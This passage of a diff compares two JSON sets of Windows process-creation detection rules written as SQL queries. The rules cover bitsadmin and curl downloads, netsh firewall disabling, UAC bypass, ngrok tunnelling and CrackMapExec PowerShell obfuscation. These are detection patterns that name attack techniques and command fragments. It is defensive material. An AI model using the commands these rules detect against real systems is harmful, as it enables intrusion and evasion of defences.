"attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "title": "MsiExec Web Install", + "id": "f7b5f842-a6af-4da5-9e95-e32478f3cd2f", + "status": "test", + "description": "Detects suspicious msiexec process starts with web addresses as parameter", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036.007" + "attack.t1218.007", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%.doc.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.lnk' ESCAPE '\\' OR ParentProcessName LIKE '%.doc.js' ESCAPE '\\' OR ParentProcessName LIKE '%.docx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xls.js' ESCAPE '\\' OR ParentProcessName LIKE '%.xlsx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.ppt.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pptx.js' ESCAPE '\\' OR ParentProcessName LIKE '%.rtf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.pdf.js' ESCAPE '\\' OR ParentProcessName LIKE '%.txt.js' ESCAPE '\\') OR (ParentCommandLine LIKE '%.doc.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.lnk%' ESCAPE '\\' OR ParentCommandLine LIKE '%.doc.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.docx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xls.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.xlsx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.ppt.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pptx.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.rtf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.pdf.js%' ESCAPE '\\' OR ParentCommandLine LIKE '%.txt.js%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% msiexec%' ESCAPE '\\' AND CommandLine LIKE '%://%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_double_extension_parent.yml" + "filename": "proc_creation_win_msiexec_web_install.yml" }, { - "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", - "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "title": "Suspicious Curl.EXE Download", + "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", "status": "experimental", - "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", - "author": "@gott_cyber", + "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.defense_evasion", - "attack.t1218", "attack.t1105" ], "falsepositives": [ - "Since the content of the files are unknown, false positives are expected" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ldifde_file_load.yml" + "filename": "proc_creation_win_curl_susp_download.yml" }, { - "title": "Application Removed Via Wmic.EXE", - "id": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "title": "WSL Child Process Anomaly", + "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", "status": "experimental", - "description": "Uninstall an application with wmic", - "author": "frac113", + "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%call%' ESCAPE '\\' OR CommandLine LIKE '%uninstall%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmic_uninstall_application.yml" + "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" }, { - "title": "Potential Network Sniffing Activity Using Network Tools", - "id": "ba1f7802-adc7-48b4-9ecb-81e227fddfd5", + "title": "IIS Native-Code Module Command Line Installation", + "id": "9465ddf4-f9e4-4ebd-8d98-702df3a93239", "status": "test", - "description": "Detects potential network sniffing via use of network tools such as \"tshark\", \"windump\".\nNetwork sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", - "author": "Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious IIS native-code module installations via command line", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ - "Legitimate administration activity to troubleshoot network issues" + "Unknown as it may vary from organisation to organisation how admins use to install IIS modules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\tshark.exe' ESCAPE '\\' AND CommandLine LIKE '%-i%' ESCAPE '\\') OR NewProcessName LIKE '%\\\\windump.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%install%' ESCAPE '\\' AND CommandLine LIKE '%module%' ESCAPE '\\' AND (CommandLine LIKE '%/name:%' ESCAPE '\\' OR CommandLine LIKE '%-name:%' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_network_sniffing.yml" + "filename": "proc_creation_win_iis_appcmd_susp_module_install.yml" }, { - "title": "Suspicious New Service Creation", - "id": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", + "title": "Use of TTDInject.exe", + "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", "status": "experimental", - "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath=%' ESCAPE '\\') OR (CommandLine LIKE '%New-Service%' ESCAPE '\\' AND CommandLine LIKE '%-BinaryPathName%' ESCAPE '\\')) AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" ], - "filename": "proc_creation_win_susp_service_creation.yml" + "filename": "proc_creation_win_lolbin_ttdinject.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - Process Creation", - "id": "02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf", - "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", + "title": "Devtoolslauncher.exe Executes Specified Binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "test", + "description": "The Devtoolslauncher.exe executes other binary", + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], "falsepositives": [ - "Legitimate use of the library" + "Legitimate use of devtoolslauncher.exe by legitimate user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (CommandLine LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR CommandLine LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR CommandLine LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR CommandLine LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR CommandLine LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR CommandLine LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR CommandLine LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_download_com_cradles.yml" + "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" }, { - "title": "HackTool - ADCSPwn Execution", - "id": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "status": "test", - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "author": "Florian Roth (Nextron Systems)", + "title": "Delete All Scheduled Tasks", + "id": "220457c1-1c9f-4c2e-afe6-9598926222c1", + "status": "experimental", + "description": "Detects the usage of schtasks with the delete flag and the asterisk symbole to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1557.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% --adcs %' ESCAPE '\\' AND CommandLine LIKE '% --port %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /delete %' ESCAPE '\\' AND CommandLine LIKE '%/tn \\*' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_adcspwn.yml" + "filename": "proc_creation_win_schtasks_delete_all.yml" }, { - "title": "Direct Autorun Keys Modification", - "id": "24357373-078f-44ed-9ac4-6d334a668a11", + "title": "Domain Trust Discovery Via Dsquery", + "id": "3bad990e-4848-4a78-9530-b427d854aac0", "status": "test", - "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", + "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", + "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", - "Legitimate administrator sets up autorun keys for legitimate reasons.", - "Discord" + "Legitimate use of the utilities by legitimate user for legitimate reason" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows%' ESCAPE '\\' OR CommandLine LIKE '%\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' OR CommandLine LIKE '%\\\\system\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\AlternateShell%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml" + "filename": "proc_creation_win_dsquery_domain_trust_discovery.yml" }, { - "title": "New Firewall Rule Added Via Netsh.EXE", - "id": "cd5cfd80-aa5f-44c0-9c20-108c4ae12e3c", + "title": "UAC Bypass Using PkgMgr and DISM", + "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", "status": "test", - "description": "Detects the addition of a new rule to the Windows firewall via netsh", - "author": "Markus Neis, Sander Wiebing", + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% firewall %' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\' OR CommandLine LIKE '%\\\\netsh.exe advfirewall firewall add rule name=Dropbox dir=in action=allow \"program=C:\\\\Program Files\\\\Dropbox\\\\Client\\\\Dropbox.exe\" enable=yes profile=Any%' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' AND CommandLine LIKE '%advfirewall firewall show rule name=all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_netsh_fw_add_rule.yml" + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" }, { - "title": "Rar Usage with Password and Compression Level", - "id": "faa48cae-6b25-4f00-a094-08947fef582f", - "status": "test", - "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", - "author": "@ROxPinTeddy", + "title": "Use Of The SFTP.EXE Binary As A LOLBIN", + "id": "a85ffc3a-e8fd-4040-93bf-78aff284d801", + "status": "experimental", + "description": "Detects the usage of the \"sftp.exe\" binary as a LOLBIN by abusing the \"-D\" flag", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of Winrar command line version", - "Other command line tools, that use these flags" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% -hp%' ESCAPE '\\' AND (CommandLine LIKE '% -m%' ESCAPE '\\' OR CommandLine LIKE '% a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sftp.exe' ESCAPE '\\' AND (CommandLine LIKE '% -D ..%' ESCAPE '\\' OR CommandLine LIKE '% -D C:\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rar_compression_with_password.yml" + "filename": "proc_creation_win_lolbin_sftp.yml" }, { - "title": "HackTool - CrackMapExec PowerShell Obfuscation", - "id": "6f8b3439-a203-45dc-a88b-abf57ea15ccf", - "status": "test", - "description": "The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.", - "author": "Thomas Patzke", + "title": "VolumeShadowCopy Symlink Creation Via Mklink", + "id": "40b19fa6-d835-400c-b301-41f3a2baacaf", + "status": "stable", + "description": "Shadow Copies storage symbolic link creation using operating systems utilities", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027.005" + "attack.credential_access", + "attack.t1003.002", + "attack.t1003.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator working with shadow copies, access for backup purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%join%split%' ESCAPE '\\' OR CommandLine LIKE '%( $ShellId[1]+$ShellId[13]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $PSHome[%]+$PSHOME[%]+%' ESCAPE '\\' OR CommandLine LIKE '%( $env:Public[13]+$env:Public[5]+''x'')%' ESCAPE '\\' OR CommandLine LIKE '%( $env:ComSpec[4,%,25]-Join'''')%' ESCAPE '\\' OR CommandLine LIKE '%[1,3]+''x''-Join'''')%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%mklink%' ESCAPE '\\' AND CommandLine LIKE '%HarddiskVolumeShadowCopy%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml" + "filename": "proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml" }, { - "title": "Firewall Disabled via Netsh.EXE", - "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", - "status": "test", - "description": "Detects netsh commands that turns off the Windows firewall", - "author": "Fatih Sirin", + "title": "Service Security Descriptor Tampering Via Sc.EXE", + "id": "98c5aeef-32d5-492f-b174-64a691896d25", + "status": "experimental", + "description": "Detection of sc.exe utility adding a new service with special permission which hides that service.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1562.004", - "attack.s0108" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate administration activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND CommandLine LIKE '%sdset%' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_fw_disable.yml" + "filename": "proc_creation_win_sc_sdset_modification.yml" }, { - "title": "PUA - Ngrok Execution", - "id": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", + "title": "MSHTA Suspicious Execution 01", + "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", "status": "test", - "description": "Detects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available.\nInvolved domains are bin.equinox.io for download and *.ngrok.io for connections.\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", + "author": "Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1140", + "attack.t1218.005", + "attack.execution", + "attack.t1059.007", + "cve.2020.1599" ], "falsepositives": [ - "Another tool that uses the command line switches of Ngrok", - "Ngrok http 3978 (https://docs.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% tcp 139%' ESCAPE '\\' OR CommandLine LIKE '% tcp 445%' ESCAPE '\\' OR CommandLine LIKE '% tcp 3389%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5985%' ESCAPE '\\' OR CommandLine LIKE '% tcp 5986%' ESCAPE '\\') OR (CommandLine LIKE '% start %' ESCAPE '\\' AND CommandLine LIKE '%--all%' ESCAPE '\\' AND CommandLine LIKE '%--config%' ESCAPE '\\' AND CommandLine LIKE '%.yml%' ESCAPE '\\') OR (NewProcessName LIKE '%ngrok.exe' ESCAPE '\\' AND (CommandLine LIKE '% tcp %' ESCAPE '\\' OR CommandLine LIKE '% http %' ESCAPE '\\' OR CommandLine LIKE '% authtoken %' ESCAPE '\\')) OR (CommandLine LIKE '%.exe authtoken %' ESCAPE '\\' OR CommandLine LIKE '%.exe start --all%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND 